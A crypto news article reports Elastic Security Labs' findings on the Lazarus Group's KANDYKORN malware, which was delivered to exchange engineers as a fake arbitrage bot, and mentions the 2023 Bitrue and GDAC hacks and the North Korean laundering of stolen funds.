BSV
$53.22
Vol 44.38m
-1.16%
BTC
$97476
Vol 54431.7m
0.55%
BCH
$455.92
Vol 375.28m
4.24%
LTC
$99.75
Vol 952.24m
2.48%
DOGE
$0.32
Vol 7392.38m
3.6%
Getting your Trinity Audio player ready...

Hackers allied to the Lazarus Group targeted a digital asset exchange in April with new malware dubbed ‘KANDYKORN,’ a new report has revealed.

The Dutch firm Elastic Security Labs revealed that the attackers lured the engineers of an unnamed digital asset exchange via a public Discord channel. They led the victims to believe they were downloading an arbitrage bot.

However, upon decompressing, the ZIP archive revealed a ‘Main.py’ script and an accompanying folder containing over a dozen other malicious Python scripts.

The chain unraveled quickly, initializing a Google Drive URL from which it downloaded malicious content. The five-stage infiltration ended up in the installation of KANDYKORN, a malware that gave the attackers advanced data access capabilities, revealed Elastic.

“KANDYKORN is an advanced implant with a variety of capabilities to monitor, interact with, and avoid detection. It utilizes reflective loading, a direct-memory form of execution that may bypass detections,” the report summarizes.

Elastic didn’t reveal the identity of the exchange the hackers targeted, but it disclosed the attack was in April. That month, the biggest attack on a digital asset exchange was on Bitrue, a Singaporean entity that lost $23 million to the attack. Bitrue didn’t reveal further details about the attack but claimed that the hackers stole less than 5% of total assets and that only its hot wallets had been compromised.

South Korean exchange GDAC also suffered a breach, losing $13 million. The hackers later laundered the proceeds through Tornado Cash, the Ethereum-based mixer whose founders were arrested and charged with conspiracy to commit money laundering and evade sanctions.

“The DPRK, via units like the LAZARUS GROUP, continues to target crypto-industry businesses with the goal of stealing cryptocurrency in order to circumvent international sanctions that hinder the growth of their economy and ambitions,” Elastic added.

North Korea has long relied on mixers to cash out its ill-gotten proceeds. However, in recent times, the country’s hackers have reportedly turned to Russian exchanges as ties between the two nations grow tighter.

According to Chainalysis, there has been a “significant escalation in the partnership between the cyber underworlds of these two nations.” And with Russia known for being notoriously uncooperative with international law enforcement agencies, Korean hackers could have an extra layer to hide under.

Watch: BSV provides solutions for cybersecurity & fraud

Recommended for you

Google unveils ‘Willow’; Bernstein downplays quantum threat to Bitcoin
Google claims that Willow can eliminate common errors associated with quantum computing, while Bernstein analysts noted that Willow’s 105 qubits...
December 18, 2024
WhatsOnChain adds support for 1Sat Ordinals with new API set
WhatsOnChain now supports the 1Sat Ordinals with a set of APIs in beta testing; with this new development, developers can...
December 13, 2024
Advertisement
Advertisement
Advertisement